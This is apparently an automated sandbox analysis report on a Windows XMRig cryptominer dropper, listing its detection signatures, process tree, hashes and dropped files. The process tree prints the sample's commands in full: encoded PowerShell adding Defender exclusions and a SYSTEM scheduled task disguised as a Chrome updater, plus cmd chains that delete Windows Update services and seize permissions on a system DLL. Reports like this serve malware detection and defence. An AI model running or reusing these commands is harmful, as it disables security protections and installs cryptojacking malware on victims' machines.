Analysis
-
max time kernel
300s -
max time network
270s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
-
submitted
05-08-2022 22:15
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 6 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAA1ADgAZQA4ADAAMQBkAGYAZABhAGEANwA1AGUAZgA5ADcANwBmAGUAYQAwADEAYQAyADAAMABmADkAMABlADcAMgAwADIANAAwADYAOAAzADMAYQAxAGUAMgBjADAANgBlAGIAZQAxADUAYQA5ADkAYQA3ADIAYwAzADgAOQA1AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAeABqAGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbABvACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD530f717dc0bedf29aa9b998e86d76a6bd
SHA177f21064eda23e6a8e98c5d0b2a35e0cb854181d
SHA2563e27184b2d400bbd8bc1baf257b372beb02cc42ec1d5d3a27c6fabbbd759ccf1
SHA5121909606e1b3ddd3adc1671cc28ffddc16da27b17378db508967558b66724c82d1b08409d2e334d85e846c01caff29a9dcbbb2022efa34f967c3e2af70d41d77e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD517286868c0a043ae5d2ff5798b6a3163
SHA1b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA25640321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d0bcbadb3ebcd041605f37019119c0b6
SHA136b16a2b0e025d40ec5a783cf78ad2ff7c38f288
SHA25620e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b
SHA512f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/32-175-0x0000000000000000-mapping.dmp
-
memory/160-303-0x00000193B4CF0000-0x00000193B4DA9000-memory.dmpFilesize
740KB
-
memory/160-297-0x00000193B4B20000-0x00000193B4B3C000-memory.dmpFilesize
112KB
-
memory/160-279-0x0000000000000000-mapping.dmp
-
memory/160-336-0x00000193B4B40000-0x00000193B4B4A000-memory.dmpFilesize
40KB
-
memory/212-230-0x0000000000000000-mapping.dmp
-
memory/316-430-0x0000000000000000-mapping.dmp
-
memory/372-188-0x0000000000000000-mapping.dmp
-
memory/420-461-0x0000000000000000-mapping.dmp
-
memory/436-272-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-261-0x0000000000000000-mapping.dmp
-
memory/436-264-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-265-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/436-266-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/436-274-0x00007FFEAC7F0000-0x00007FFEAC9CB000-memory.dmpFilesize
1.9MB
-
memory/500-190-0x0000000000000000-mapping.dmp
-
memory/516-446-0x0000000000000000-mapping.dmp
-
memory/624-464-0x0000000000000000-mapping.dmp
-
memory/644-191-0x0000000000000000-mapping.dmp
-
memory/660-463-0x0000000000000000-mapping.dmp
-
memory/700-181-0x0000000000000000-mapping.dmp
-
memory/744-444-0x0000000000000000-mapping.dmp
-
memory/1028-456-0x0000000000000000-mapping.dmp
-
memory/1096-473-0x0000000000000000-mapping.dmp
-
memory/1104-227-0x0000000000000000-mapping.dmp
-
memory/1132-240-0x0000000000000000-mapping.dmp
-
memory/1164-457-0x0000000000000000-mapping.dmp
-
memory/1340-185-0x0000000000000000-mapping.dmp
-
memory/1348-459-0x0000000000000000-mapping.dmp
-
memory/1424-466-0x0000000000000000-mapping.dmp
-
memory/1676-435-0x0000000000000000-mapping.dmp
-
memory/1812-431-0x0000000000000000-mapping.dmp
-
memory/1828-179-0x0000000000000000-mapping.dmp
-
memory/1988-229-0x0000000000000000-mapping.dmp
-
memory/1988-468-0x0000000000000000-mapping.dmp
-
memory/2024-458-0x0000000000000000-mapping.dmp
-
memory/2168-231-0x0000000000000000-mapping.dmp
-
